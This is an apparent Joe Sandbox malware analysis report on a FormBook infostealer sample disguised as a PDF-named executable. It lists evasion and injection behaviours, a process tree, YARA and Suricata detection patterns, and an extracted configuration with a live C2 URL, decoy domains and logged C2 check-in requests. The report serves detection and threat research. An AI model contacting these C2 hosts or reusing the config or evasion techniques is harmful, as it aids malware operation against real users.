Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ PC25-1301 Product Specifications_PDF.exe

Overview

General Information

Sample name:RFQ PC25-1301 Product Specifications_PDF.exe
Analysis ID:1589987
MD5:f1cb41be3365b899a74d919df902fc08
SHA1:befff58e08b3adc2058f51c884067e59708e17d3
SHA256:d59aedcde68dc8275a3ad53be28c1588790b2e5da2258a66d4492c5a7c67a7c1
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Found API chain indicative of sandbox detection
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RFQ PC25-1301 Product Specifications_PDF.exe (PID: 2940 cmdline: "C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe" MD5: F1CB41BE3365B899A74D919DF902FC08)
    • svchost.exe (PID: 6444 cmdline: "C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • autoconv.exe (PID: 4816 cmdline: "C:\Windows\SysWOW64\autoconv.exe" MD5: A705C2ACED7DDB71AFB87C4ED384BED6)
        • help.exe (PID: 5132 cmdline: "C:\Windows\SysWOW64\help.exe" MD5: DD40774E56D4C44B81F2DFA059285E75)
          • cmd.exe (PID: 2016 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.7b5846.online/hwu6/"], "decoy": ["lf758.vip", "locerin-hair.shop", "vytech.net", "pet-insurance-intl-7990489.live", "thepolithat.buzz", "d66dr114gl.bond", "suv-deals-49508.bond", "job-offer-53922.bond", "drstone1.click", "lebahsemesta57.click", "olmanihousel.shop", "piedmontcsb.info", "trisula888x.top", "66sodovna.net", "dental-implants-83810.bond", "imxtld.club", "frozenpines.net", "ffgzgbl.xyz", "tlc7z.rest", "alexismuller.design", "6vay.boats", "moocatinght.top", "hafwje.bond", "edmaker.online", "simo1simo001.click", "vbsdconsultant.click", "ux-design-courses-53497.bond", "victory88-pay.xyz", "suarahati7.xyz", "otzen.info", "hair-transplantation-65829.bond", "gequiltdesins.shop", "inefity.cloud", "jeeinsight.online", "86339.xyz", "stairr-lift-find.today", "wdgb20.top", "91uvq.pro", "energyecosystem.app", "8e5lr5i9zu.buzz", "migraine-treatment-36101.bond", "eternityzon.shop", "43mjqdyetv.sbs", "healthcare-software-74448.bond", "bethlark.top", "dangdut4dselalu.pro", "04506.club", "rider.vision", "health-insurance-cake.world", "apoppynote.com", "11817e.com", "hiefmotelkeokuk.top", "sugatoken.xyz", "aragamand.business", "alifewithoutlimits.info", "vibrantsoul.xyz", "olarpanels-outlet.info", "ozzd86fih4.online", "skbdicat.xyz", "cloggedpipes.net", "ilsgroup.net", "ptcnl.info", "backstretch.store", "maheshg.xyz"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18819:$sqlite3step: 68 34 1C 7B E1
      • 0x1892c:$sqlite3step: 68 34 1C 7B E1
      • 0x18848:$sqlite3text: 68 38 2A 90 C5
      • 0x1896d:$sqlite3text: 68 38 2A 90 C5
      • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 35 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bd90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1aaf7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bafa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a19:$sqlite3step: 68 34 1C 7B E1
          • 0x17b2c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a48:$sqlite3text: 68 38 2A 90 C5
          • 0x17b6d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a5b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17b83:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 15 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Uncommon Svchost Parent Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe", CommandLine: "C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe", CommandLine|base64offset|contains: <-], Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe", ParentImage: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe, ParentProcessId: 2940, ParentProcessName: RFQ PC25-1301 Product Specifications_PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe", ProcessId: 6444, ProcessName: svchost.exe
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe", CommandLine: "C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe", CommandLine|base64offset|contains: <-], Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe", ParentImage: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe, ParentProcessId: 2940, ParentProcessName: RFQ PC25-1301 Product Specifications_PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe", ProcessId: 6444, ProcessName: svchost.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-13T13:06:02.674559+010020314531Malware Command and Control Activity Detected192.168.2.649738164.92.166.7580TCP
          2025-01-13T13:06:22.815300+010020314531Malware Command and Control Activity Detected192.168.2.649751172.104.236.21580TCP
          2025-01-13T13:06:42.498046+010020314531Malware Command and Control Activity Detected192.168.2.649752104.21.40.19680TCP
          2025-01-13T13:07:24.284359+010020314531Malware Command and Control Activity Detected192.168.2.649753217.21.91.2480TCP
          2025-01-13T13:08:05.002852+010020314531Malware Command and Control Activity Detected192.168.2.649755104.21.80.15680TCP
          2025-01-13T13:08:46.057105+010020314531Malware Command and Control Activity Detected192.168.2.649756104.18.188.22380TCP
          2025-01-13T13:09:28.139155+010020314531Malware Command and Control Activity Detected192.168.2.64975723.225.71.16680TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: RFQ PC25-1301 Product Specifications_PDF.exeAvira: detected
          Found malware configuration
          Source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.7b5846.online/hwu6/"], "decoy": ["lf758.vip", "locerin-hair.shop", "vytech.net", "pet-insurance-intl-7990489.live", "thepolithat.buzz", "d66dr114gl.bond", "suv-deals-49508.bond", "job-offer-53922.bond", "drstone1.click", "lebahsemesta57.click", "olmanihousel.shop", "piedmontcsb.info", "trisula888x.top", "66sodovna.net", "dental-implants-83810.bond", "imxtld.club", "frozenpines.net", "ffgzgbl.xyz", "tlc7z.rest", "alexismuller.design", "6vay.boats", "moocatinght.top", "hafwje.bond", "edmaker.online", "simo1simo001.click", "vbsdconsultant.click", "ux-design-courses-53497.bond", "victory88-pay.xyz", "suarahati7.xyz", "otzen.info", "hair-transplantation-65829.bond", "gequiltdesins.shop", "inefity.cloud", "jeeinsight.online", "86339.xyz", "stairr-lift-find.today", "wdgb20.top", "91uvq.pro", "energyecosystem.app", "8e5lr5i9zu.buzz", "migraine-treatment-36101.bond", "eternityzon.shop", "43mjqdyetv.sbs", "healthcare-software-74448.bond", "bethlark.top", "dangdut4dselalu.pro", "04506.club", "rider.vision", "health-insurance-cake.world", "apoppynote.com", "11817e.com", "hiefmotelkeokuk.top", "sugatoken.xyz", "aragamand.business", "alifewithoutlimits.info", "vibrantsoul.xyz", "olarpanels-outlet.info", "ozzd86fih4.online", "skbdicat.xyz", "cloggedpipes.net", "ilsgroup.net", "ptcnl.info", "backstretch.store", "maheshg.xyz"]}
          Multi AV Scanner detection for submitted file
          Source: RFQ PC25-1301 Product Specifications_PDF.exeReversingLabs: Detection: 36%
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: RFQ PC25-1301 Product Specifications_PDF.exeJoe Sandbox ML: detected
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: wntdll.pdbUGP source: RFQ PC25-1301 Product Specifications_PDF.exe, 00000000.00000003.2332742622.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, RFQ PC25-1301 Product Specifications_PDF.exe, 00000000.00000003.2334998712.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2399691163.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2399691163.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337730554.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334619493.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.4770864197.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000005.00000003.2399183500.000000000316A000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000003.2400905474.0000000003317000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.4770864197.000000000365E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RFQ PC25-1301 Product Specifications_PDF.exe, 00000000.00000003.2332742622.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, RFQ PC25-1301 Product Specifications_PDF.exe, 00000000.00000003.2334998712.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2399691163.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2399691163.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337730554.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334619493.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, help.exe, help.exe, 00000005.00000002.4770864197.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000005.00000003.2399183500.000000000316A000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000003.2400905474.0000000003317000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.4770864197.000000000365E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: help.pdbGCTL source: svchost.exe, 00000002.00000002.2399341941.00000000029C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.2399474583.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2399509273.0000000002C12000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.4769749796.0000000000870000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.4782465999.0000000010C2F000.00000004.80000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.4771639384.0000000003A0F000.00000004.10000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.4770053790.0000000002F61000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: help.pdb source: svchost.exe, 00000002.00000002.2399341941.00000000029C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.2399474583.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2399509273.0000000002C12000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.4769749796.0000000000870000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.4782465999.0000000010C2F000.00000004.80000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.4771639384.0000000003A0F000.00000004.10000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.4770053790.0000000002F61000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A7C2A2 FindFirstFileExW,0_2_00A7C2A2
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB68EE FindFirstFileW,FindClose,0_2_00AB68EE
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00AB698F
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AAD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00AAD076
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AAD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00AAD3A9
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00AB9642
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00AB979D
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00AADBBE
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00AB9B2B
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00AB5C97
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi2_2_00417D7F
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi5_2_02CC7D7F

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49753 -> 217.21.91.24:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49753 -> 217.21.91.24:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49738 -> 164.92.166.75:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49753 -> 217.21.91.24:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49738 -> 164.92.166.75:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49738 -> 164.92.166.75:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49751 -> 172.104.236.215:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49755 -> 104.21.80.156:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49751 -> 172.104.236.215:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49751 -> 172.104.236.215:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49755 -> 104.21.80.156:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49755 -> 104.21.80.156:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49757 -> 23.225.71.166:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49757 -> 23.225.71.166:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49757 -> 23.225.71.166:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49752 -> 104.21.40.196:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49752 -> 104.21.40.196:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49752 -> 104.21.40.196:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49756 -> 104.18.188.223:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49756 -> 104.18.188.223:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49756 -> 104.18.188.223:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 164.92.166.75 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 172.104.236.215 80Jump to behavior
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.7b5846.online/hwu6/
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.maheshg.xyz
          Source: DNS query: www.86339.xyz
          Source: DNS query: www.86339.xyz
          Source: global trafficHTTP traffic detected: GET /hwu6/?CXFd8=VqwCA0fDirS9FNcK+XWY5HArCimG0sfrxcJclabbIM4+tzWzOeCWxbUPg8n3aCtVsQmTH2yodQ==&Ez=ltxdQ8m HTTP/1.1Host: www.simo1simo001.clickConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hwu6/?CXFd8=mpYjKcP0TN+fbEitUHIdgmI2VRYct5ttq2KUkf3p2L9OArgqjWS4GwM5LnRr9sxMQhRrBRaxzw==&Ez=ltxdQ8m HTTP/1.1Host: www.ilsgroup.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hwu6/?CXFd8=YeF1y3E0QpZaaHwaKvJk7b1+zf3Y35LdyPqCzn7ElcW/f++Fd6XCLGgtd2HkwQuXQqI9c12LSg==&Ez=ltxdQ8m HTTP/1.1Host: www.7b5846.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hwu6/?CXFd8=FXfZ1xOYYW9swHejpVIfMDCztZ/FrnQZeJUgNQ4rzoTHCxvijkBbGX2//Z/tWIGDAo4gMXnXlg==&Ez=ltxdQ8m HTTP/1.1Host: www.maheshg.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hwu6/?CXFd8=+zwICv/sB1e6MtWwpRel8f5Q0bYKICZzsoJO8W/+cdiLpY7N+AEBhZIv3jjSTSPlRhhnl/FLAA==&Ez=ltxdQ8m HTTP/1.1Host: www.gequiltdesins.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 104.21.40.196 104.21.40.196
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: ASN-DPSDUS ASN-DPSDUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
